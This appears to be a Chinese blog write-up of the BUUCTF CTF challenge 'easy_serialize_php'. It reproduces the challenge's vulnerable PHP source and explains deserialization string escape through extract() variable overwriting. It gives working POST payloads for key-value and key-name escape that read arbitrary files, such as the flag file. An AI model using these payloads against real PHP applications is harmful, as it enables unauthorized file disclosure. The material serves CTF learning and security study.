buuctf[安洵杯 2019]easy_serialize_php

于 2023-03-30 10:44:51 发布
阅读量438 收藏 2
点赞数 2
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/129822128
版权

第一次接触php序列化与反序列化,参考文章:

PHP反序列化_mineflame_的博客-CSDN博客

通过CTF题目学习反序列化字符串逃逸 - 先知社区
 

序列化:将变量转换为可保存或传输的字符串的过程;
反序列化:在适当的时候把这个字符串再转化成原来的变量使用;
这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性;
常见的php序列化和反序列化方式主要有:serialize,unserialize

1.启动环境,查看index.php源码

分析源码:初步学习了impode()函数,preg_replace()函数,extract()函数

 <?php

$function = @$_GET['f'];   //function的value是由$_GET['f']传进来的

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';  //implode() 函数返回
一个由数组元素组合成的字符串
    return preg_replace($filter,'',$img);  //preg_replace 函数执行一个
正则表达式的搜索和替换。把传入的值中的敏感字符(‘php’,‘flag’,‘php5’,‘php4’,‘fl1g’)
替换成 空格
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST); //extract() 函数从数组中将变量导入到当前的符号表
($_SESSION["user"]和$_SESSION['function']的内容可以通过post的方式传递)

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}  //当以get方法传入img_path的情况下,$_SESSION['img']为传入的img_path进行base64加密
和sha1加密

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo')   //将_SESSION序列化且过滤,将值赋给$serialize_info{
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info); //当get传入的f的值,也就是
$function的值等于'show_image'时,就会将$serialize_info反序列化,然后将值
赋给$userinfo['img']指向的文件(base64解密后)
    echo file_get_contents(base64_decode($userinfo['img']));
}

2.根据提示,f=phpinfo

发现自动包含了文件/d0g3_f1ag.php,那么我们就需要查看这个文件

 3.继续看代码,最后一个语句有函数file_get_contents()就是查看文件,我们就需要使里面的参数为该php文件

看值$userinfo,是对_SESSION变量序列化后过滤再反序列化,存在反序列化字符逃逸漏洞。

反序列化字符逃逸,分为两类:一类是字符增多,一类是减少,

本题利用的是一个过滤函数,所以是减少类型的

上文代码中有一个输出的内容,是我们可控的部分,我们可以通过改变img_path的内容或者直接改变userinfo[‘img’]的内容来达到 读取flag的目的。看到$serialize_info = filter(serialize($_SESSION)); 果断想到反序列化字符串逃逸

反序列化字符逃逸的漏洞本质

改变序列化字符串的长短,在序列化的对象反序列化过程中,参数是严谨的,确定了字符的长度,会自动往后找补,并且会自动将{}以外的内容抛弃。
在构造键值的时候被过滤掉了,但序列化后的字符串记录的长度不会因为过滤而改变,所以就会把序列化后的字符串的结构当做值的内容给读取。如果我们自己构造出反序列化字符串的结构,并因为过滤破坏掉原来的结构,就可以构造出恶意代码。

反序列化字符逃逸的两种方法:键值逃逸,键名逃逸

键值逃逸:若SESSION参数:
$_SESSION["user"] = 'guestflagflagflagflag';
$_SESSION['function'] = 'aaaa';
$_SESSION['img']=base64_encode('guest_img.png');
序列化后:a:3{s:4:"user";s:21:"guestflagflagflagflag";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
但是经过filter关键字会过滤掉flag,于是序列化字段会变短,但仍被当作了原来的value。

过滤后的结果:
a:3:{s:4:"user";s:21:"guest";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于user字段值的长度仍为21,所有会往后吞21个字符,一直吞到guest";s:8:"function",那有没有一种可能让function的值足够长能够包含我们指定为base64(dog3_flag.php)的img序列化的内容字段且被过滤掉关键字长度刚好能把img序列化字段吞进去,达到指定img赋值的效果?
首先得让img序列包含在function中这样我们才能通过吞取赋值img的值

若:
$_SESSION["user"] = 'guestflagflagflagflagflagflagflag';
$_SESSION['function'] = 'aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}';
在序列化SESSION得:
a:3:{s:4:"user";s:33:"guestflagflagflagflagflagflagflag";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
filter过滤后的结果:
a:3:{s:4:"user";s:33:"guest";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于替换了7个flag关键字,会往后吞28个字符串,刚好将guest";s:8:"function";s:69:"aaaaa 赋给了user,后面构造img变量,后面是随便添加的一个变量,刚好满足三个变量

使用hackbar进行post传参:

_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}

提示flag在/d0g3_fllllllag文件中.

/d0g3_fllllllag的Base64编码为L2QwZzNfZmxsbGxsbGFn

 4.更改img为L2QwZzNfZmxsbGxsbGFn

_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"1";s:1:"2";}

得到flag

 

 键名逃逸

原理类似,

1.先构造payloa

_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

过滤前
a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
过滤后
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
下面的步骤和值替换一样
这里的键名变为";s:48: 实现了逃逸
 

2._SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

 

木…
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[安洵杯 2019]easy_serialize_php
m0_63253040的博客
09-23 497
然后利用变量覆盖得到SESSION[img],中间会给我们制造一个SESSION[img]但是不是我们要的,需要去绕过它。unserialize会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号后面的就都被扔掉。所以利用filter函数去过滤字符使得前面的既有我们想要的,又成立,可以绕过后面的img。在变量覆盖的后面,所以我们不能直接去读,这里利用反序列化字符串逃逸绕过。这样我们前面的刚好满足反序列化,后面的就可以绕过了。首先我们构造一个序列化的img。值绕过,原理是相似的。
[安洵杯 2019]easy_serialize_php 详解
最新发布
weixin_62306641的博客
02-14 248
在这道题中是将falg,php.......等字符串替换为空,替换完成后对象名,对象的类型,对象的长度都没变,但是内容没了。那么他就会依据长度吧后面的内容给囊括进去。反序列化中的对象是以{}作为开头结尾的,并且有对象名,对象的类型,对象的长度。但是他给出的例子中并没有$_SESSION[img'],这时候就需要利用到php反序列化逃逸。巧合地是,这时候又变成了一个完整的反序列化内容,又可以被解析,于是我们就可以依据这点来利用。从上述例子可以看出来,当序列化再反序列化后,依旧可以根据键名的到值。
web buuctf [安洵杯 2019]easy_serialize_php
weixin_44214568的博客
04-02 432
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
[安洵杯 2019]easy_serialize_php 1
shinygod的博客
03-04 1767
知识点:反序列化字符串逃逸(2种情形),extract变量覆盖漏洞 目录反序列化字符串逃逸反序列化的规则00x1:过滤后字符变多00x1:过滤后字符变少(本题就是此类型)值替换键替换 反序列化字符串逃逸 一般这类漏洞,都是在序列化之后,过滤,然后反序列化引起的。 反序列化的规则 了解反序列化字符串逃逸之前,先了解反序列化的规则 例如: a:2:{s:4:"user";s:5:"guest";s:8:"function";s:3:"aaa";} //第一个a代表这是一个数组序列化 php反序列化会以 ;
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
[安洵杯 2019]easy_serialize_php (对象逃逸)
qq_54929891的博客
03-09 3428
老规矩,分析代码,一般给你一大堆代码的题目肯定是其中某个函数有漏洞啥的 过滤函数filter,其中implode函数的作用是:将$filter_arr这个数组合并为一个字符串,并以|分割开来;所以这个正则表达式是preg_replace(/php|flag|php5|php4|f1lg/i,'',$img);filter函数作用就是过滤这五个字符串。 如果$_SESSION存在,则销毁它(unset),然后是字典的键值对的对应,extract这个函数重中之重!!!它会将你post传入的...
BUUCTF [安洵杯 2019]easy_serialize_php
m0_62107966的博客
09-24 523
BUUCTF [安洵杯 2019]easy_serialize_phpphp反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。 所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效
BUUCTF--[羊城杯 2020]EasySer
qq_46263951的博客
08-20 790
进入后是这样的页面,有点懵, 看下大佬的思路: 1) 源码写了不安全协议从本地,想到http 和127.0.0.1 2) 读源码看反序列化,写入shell 3) 伪协议base64绕过die(),rot13等等都可以 考点: 1) PHP 基础代码审计 2) SSRF本地文件读取 3) 反序列化写入webshell,绕过死亡绕过 使用文件扫描扫到robots.txt,提示访问/star1.php/ 查看页面的源代码可以看到提示 利用http://127.0.0.1/star1.php...
[2019]easy_serialize_php 1
qq_53460654的博客
09-28 1285
打开环境得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值